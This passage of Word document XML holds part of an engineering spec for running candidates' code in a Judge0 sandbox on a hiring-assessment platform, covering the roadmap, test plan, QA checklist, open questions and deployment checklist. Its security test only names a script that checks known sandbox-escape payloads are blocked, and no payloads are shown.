      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Redis queue + BullMQ orchestration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Basic logging + alerting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual fallback (on-call escalation for outages)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="v1-phase-2-m3m4-reliability"/>
      <w:r>
        <w:t xml:space="preserve">v1 (Phase 2, M3–M4): Reliability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Judge0 redundancy (second Mac Mini or AWS EC2 spot instance)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Failover logic (orchestrator routes to secondary if primary unreachable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dedicated Apex execution pool (multiple orgs for load balancing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Advanced metrics (per-language p99 tracking, memory profiling)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="v2-phase-3-m6-scale"/>
      <w:r>
        <w:t xml:space="preserve">v2 (Phase 3, M6+): Scale</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hosted Judge0 evaluation (RapidAPI or self-managed Judge0 on dedicated VPS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kubernetes auto-scaling (if micro-services exceed 8 distinct services; revisit at $50M ARR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per-customer sandbox tier (Stack-Vault Enterprise: dedicated sandbox for data isolation + compliance)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Real-time output streaming (WebSocket feedback for long-running tests)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test-plan"/>
      <w:r>
        <w:t xml:space="preserve">§ 12 Test Plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="golden-corpus"/>
      <w:r>
        <w:t xml:space="preserve">12.1 Golden Corpus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create 50 reference solutions across 12 languages with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">locked expected verdicts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">QOR-JAVA-REF-001: Sum two integers → Correct: 5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">QOR-JAVA-REF-002: Reverse string → Correct: "dlrow olleh"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">QOR-PYTHON-REF-001: Fibonacci → Correct: [0, 1, 1, 2, 3, 5, 8, 13]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Every Judge0 image upgrade or environment change → re-run golden corpus; expect ≤2% delta in execution latency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="regression-test-suite"/>
      <w:r>
        <w:t xml:space="preserve">12.2 Regression Test Suite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Before deploy to Mac Mini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Regression: Execute golden corpus against Judge0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">./scripts/test-judge0-regression.sh</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Load test: 500 concurrent submissions (simulate M3 peak)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">artillery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> run load-test.yml</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Assert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> p95 ≤ 5s</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Assert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> error 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1%</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Security test: Run 20 known sandbox-escape payloads</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">./scripts/security-test-payloads.sh</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Assert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> all blocked (no exfiltration)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="manual-qa-checklist"/>
      <w:r>
        <w:t xml:space="preserve">12.3 Manual QA Checklist</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Java question executes; test cases score correctly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Python submission with syntax error → captured in stderr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ SQL query (SELECT) against isolated DB → no cross-submission data leakage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Rust code timeout → scored as fail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Apex code with governor limit → caught, logged, retried</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Stack-Vault watermarked variant → seed-based perturbations visible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Queue backlog recovery (pause Judge0, enqueue 200 jobs, restart) → all jobs replay in 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open-questions-for-senior-engineer-1"/>
      <w:r>
        <w:t xml:space="preserve">§ 13 Open Questions for Senior Engineer #1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Docker resource isolation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Docker Desktop (Mac) vs lima vs colima for running Judge0? Recommend lima for better cgroup v2 support and resource limits; need confirmation from Sr Engineer on local dev setup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Judge0 PostgreSQL backing store:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Should Judge0’s internal submissions table (which caches results) live on shared VPS PostgreSQL, or separate on Mac Mini? Tradeoff: shared DB = easier querying across judge0/qorium, but network dependency; separate = resilient but data duplication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Apex governor limit failures:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">When candidate Apex hits governor limit (e.g., SOQL 100-query limit), should we:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option A: Treat as test-fail (score 0).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option B: Show partial credit (candidate wrote valid logic, just hit limit).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option C: Retry on next org rotation (defer decision).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recommend Option A (strict grading; aligns with production Salesforce) pending Sr Engineer review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Optional: WebContainer fallback timeline.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Wave 1 doesn’t strictly need it (judge0 sufficient for grading). Defer to M2 if UX feedback demands browser preview? Or build now?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dependencies-prerequisites"/>
      <w:r>
        <w:t xml:space="preserve">§ 14 Dependencies &amp; Prerequisites</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="to-ship-v0-m1-start"/>
      <w:r>
        <w:t xml:space="preserve">To Ship v0 (M1 start):</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✓ PostgreSQL B7 schema (content.questions, content.responses, content.leak_alerts live)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✓ Mac Mini M4 Pro (provisioned, Tailscale connected, Docker installed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✓ Judge0 v1.13+ (docker-compose.yml authored and tested locally)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✓ Salesforce developer org (created; Platform CLI installed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✓ Express API scaffold (orchestrator endpoint: POST /v1/submissions ready for integration)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✓ Redis BullMQ queue (already running on VPS for cache/sessions; extend for job queue)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="to-scale-to-v1-m3"/>
      <w:r>
        <w:t xml:space="preserve">To Scale to v1 (M3):</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Senior Engineer #1 (handles scaling, failover logic, performance tuning)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I/O Psychologist contractor (validates variant difficulty via golden set; ensure ±0.2 IRT units post-sandbox)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Infrastructure: second Mac Mini or AWS spot instance for Judge0 redundancy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deployment-checklist"/>
      <w:r>
        <w:t xml:space="preserve">§ 15 Deployment Checklist</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Mac Mini: Judge0 docker-compose up running, healthcheck passing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Mac Mini: Tailscale route to VPS confirmed, judge0.ts.net:2358 reachable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ VPS:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qorium-judge0-orchestrator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PM2 process deployed, logs streaming</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ VPS: Redis BullMQ queue initialized; test enqueue → dequeue cycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ VPS: PostgreSQL content.questions has sandbox_config JSONB column + sample data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Salesforce: Developer org provisioned, Platform CLI configured, test Apex execution runs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Tests: Golden corpus regression passes; security payloads blocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Alerting: Grafana dashboards + Sentry integration live</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Documentation: On-call runbook (Judge0 restart, org rotation, failover procedure) in place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Word count:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3,150 words.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">End of Judge0-Sandbox-Integration-Spec-v0.md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2026-05-02T05:47:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-02T05:47:51Z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